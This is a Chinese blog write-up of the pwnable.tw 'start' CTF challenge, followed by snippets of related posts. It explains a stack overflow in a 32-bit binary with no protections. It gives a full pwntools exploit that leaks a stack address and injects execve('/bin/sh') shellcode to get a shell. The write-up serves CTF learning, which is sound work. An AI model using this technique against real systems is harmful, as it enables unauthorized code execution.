【pwnable.tw】start

已于 2023-09-23 10:55:22 修改
阅读量165 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: # pwnable 文章标签: 安全
于 2023-09-22 09:54:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133157665

32位程序,保护全关,应该是用汇编写的,就只有_start和_exit两个函数。

首先是向栈中push一个字符串,然后输出该字符串后再向栈中输入0x3c个字符。注意在read的时候并没有设置ecx,所以这个时候ecx仍然等于esp,所以就是直接向栈上写入0x3c个字符。

这里很明显有栈溢出,因为我们可以看最后的返回语句:

.text:08048099 83 C4 14                      add     esp, 14h
.text:0804809C C3                            retn

将栈抬升0x14后直接ret,这里ret的值就是最开始push的_exit,所以我们可以直接覆盖返回地址。由于没有开启NX保护,所以可以先泄漏栈地址,然后直接往栈上写入shellcode即可。

那么如何泄漏栈地址呢?注意到最开始的时候是把esp的值给push到了栈中,而且刚好在_exit后面。

—————————— <=== esp

0x14

——————————

_exit

__________________

old_esp

__________________

所以我们可以先将返回地址_exit给覆盖为0x08048087,这样就会再一次调用read函数,而这里ecx是等于esp的,此时栈布局如下:

——————————<=== esp

old_esp

__________________

那么就可以泄漏栈地址了,然后再向栈上写入shellcode并返回到栈上执行即可。

from pwn import *
context(arch = "i386", os = "linux", endian = "little")
context.terminal = ['tmux', 'splitw', '-h']
#io = process("./start")
#io = remote("chall.pwnable.tw", 10000)
io = remote("node4.buuoj.cn", 28734)

#gdb.attach(io, 'b *0x8048097')
pay = b'A'*0x14 + p32(0x08048087)
io.sendafter(b'CTF:', pay)
stack = u32(io.recv(4))
print(hex(stack))

shellcode = asm("""
        mov eax, 11
        mov ebx, {0}
        xor ecx, ecx
        xor edx, edx
        int 0x80
""".format(stack))
print(shellcode)
pay = b'A'*4 + b'/bin/sh\x00' + b'A'*(0x14-8-4) + p32(stack+0x14) + shellcode
print(hex(len(pay)))
io.send(pay)
#pause()
io.interactive()

pwnable.tw第一题start
计算机小白的博客
08-09 5673
这应该是我做的第一道pwn的题了(虽然也是看了很多别人的WriteUp),想了两天,才终于弄清楚了,在这里记录一下。拿到手以后发现是一个ELF文件,就放进kali虚拟机里面运行一下先: 程序启动以后打印一段话,然后让你输入,就完事了。 再放入IDA中,观察: 检测栈有点问题,不能够F5,强行看汇编。。。 5个push是打印出来的那句话, Let’s start the CTF: 下面一句
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 686
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
pwnable.tw---start
杀生丸?不,其实我要的是桔梗
04-30 1655
Pwnable.twstart 最近比赛玩了好几天的pwn,发现老是差点火候,开始正式刷刷Pwnable.tw看看。 题目分析: checksec : 第一次遇到什么防护都不开的程序,兴奋。 IDA: 题目只有start和exit。 检测栈有点问题,不能够F5,强行看汇编。。。 .text:08048060 public _start ....
pwnable.tw 第一题之start
像初雪一样自由洒落
04-26 627
今天学长布置了作业,,,做这道题,,, 言承这次遇到的第一个情况,,,就是页面打开了,题目出不来。作为一名安全一份子,一直不会访问外网,流泪。 趁着这次机会,搞定了,参考博客:https://www.wonxun.net/share/444 然后我们来看题 32位的程序,程序什么也没开,,,感觉挺友善的哈 执行效果,,挺好就一个输入点,基本猜测就是栈溢出,,, 用id...
pwnable.tw start writeup
jmp esp
09-27 1537
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
pwnable.twstart
weixin_51055545的博客
04-22 409
检查程序 任何保护都没开, 放到IDA中分析: 逆向分析 很简单的一个程序,只有start和exit两个函数,通过分析汇编,我们知道,程序先write出欢迎的语句,然后系统调用read(),来让我们输入,我们输入的栈上是可读可写可执行的,所以我们leak出stack地址,然后控制程序返回到我们构造好的shellcode即可, 思路 1.通过构造write()来leak出栈地址 2.通过控制返回地址,来执行我们的shellcode,从而达到getshell的目的. exp分析: io.recvuntil(
pwnable.tw-2018-starbound_writeup
CabbageWind的博客
08-17 543
题目:Pwnable.tw-starbound 解法1:ret2libc 1.进入程序进行观察: 这是一个交互小游戏,存在多处用户输入的位置,很有可能存在栈溢出漏洞。 2.查看文件保护状态: 3.使用IDA中查看文件内容: 这个文件较之平时的其他题目代码量大了很多,存在许多输入位置,但是找了一圈没有可以直接利用的栈溢出漏洞。 4.在反汇编代码中发现一个逻辑漏洞: 在用户输入时,程序只对输入值进行了strtol()处理,并把该值作为数组下标,也就是说对于输入的数字只要不为零都是可以利用p_choice
linux 获取 基地址,linux - 每个函数加载的glibc基地址不同。 - SO中文参考 - www.soinside.com...
weixin_39601794的博客
05-14 872
我试图计算一个二进制文件的库的基地址.我有printf,putes ecc的地址,然后我减去它的偏移量,得到库的基地址.我对printf,putes和signal这样做,但每次我得到的基地址都不一样。这个 帖子,但我也无法得到正确的结果。ASLR被禁用。这是我取函数库地址的地方。gdb-peda$ x/20wx 0x804b0180x804b018 : 0xf7e05720 0x...
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1548
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
pwnable.tw-start
qq_35661990的博客
10-05 1022
参考了好多文章才能大致理解shellcode 这题开始就有一个大坑 可以看到不同的checksec查看start文件会有不同的结果,就结果而言,GDB-PEDA的checksec很不靠谱。。我根本没有s命名的文件。。 所以,start是一个32位没有开启NX的程序,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行...
Pwnable.tw start [Writeup]
柷敔的博客
02-18 1109
Pwnable.tw start [Writeup] 题源 https://pwnable.tw/challenge/#1 题解 先看一下安全保护情况 再dump一下源码 拖到IDA里一看,也就是内联汇编写的代码(此处略去)。毕竟是入门第一题,都是用的简单的汇编指令。简单注释一下: [line 1]08048060 <_start>: [line 2] 8048060: 54 push %esp ; 泄露了栈地
pwnable.tw--->start 01
程序员晓老九
10-18 231
pwnable.tw 01 前提--->链接 PWNABLE.TW 02 Challenges 01 start IDA似乎看不出啥来 扔到peda里反汇编看一看,因为是x86(file可知),先写再读。 就知道这么点信息,没啥头绪,猜测是shellcode解。 write的长度是0x14,read的长度是0x3c,明显读的比写的长 覆盖_exit的offset是20,两种方法 1 在_start的ret处下断点--->到退出是20,32位对...
pwnable.tw start,orw学习
weixin_46521144的博客
07-06 267
暑假开始刷pwnable.tw start 这个反编译出来一开始看蒙了,不知道在干啥。后来仔细看看字节码,发现是系统调用write输出的stack上的内容。 后面是read函数,观察修改的寄存器内容 发现是read系统调用,输入数据大小为0x3c 然而buffer大小为0x14,这就产生了栈溢出。这里是把一个shellcode放到返回地址,那就需要知道返回的栈地址,这里比较巧妙。注意到 这里将打印esp地址中的数据,只要返回ret的时候调用,就可以输出esp地址,在下一次放在re
pwnable.tw 001
foyjog的研究生涯
09-08 661
https://pwnable.tw/的网址,他是一个提供pwn题目的网址,做逆向破解,做做二进制也是必须的,所以也把做这些题目的心得记录下来。 第一题,start,地址为nc chall.pwnable.tw 10000,我们下载这个文件,然后拖入ida进行分析。 很短的代码,贴出来如下:ext:08048060 public _start .text:0804
Pwnable.tw WP
AlexYoung28的博客
08-18 964
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1490
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
pwnable.tw - start
不急不躁
07-08 4259
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
Fortinet发布全新AI驱动邮件安全解决方案组合,邮件安全产品矩阵再升级
最新发布
Sophya89的博客
06-23 398
专注推动网络与安全融合的全球性综合网络安全解决方案供应商 Fortinet®(NASDAQ:FTNT),近日宣布发布新一代企业级邮件安全解决方案组合FortiMail Workspace Security suite,全面增强旗下数据和生产力安全产品组合,实现邮件安全生态全面进化。
企业级安全实践:SSL 加密与权限管理(一)
06-22 897
SASL 认证、ACL 权限控制、传输层加密配置。
11个单页源码压缩包:28365365.tw的开发宝库
在标签信息中提供的“28365365.tw”可能是一个与项目相关的标识符,而文件包“28365365.tw_11个单页源码.rar”表明这是一组组织良好的文件。在软件开发中,良好的文件管理习惯和版本控制系统是非常重要的。这通常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值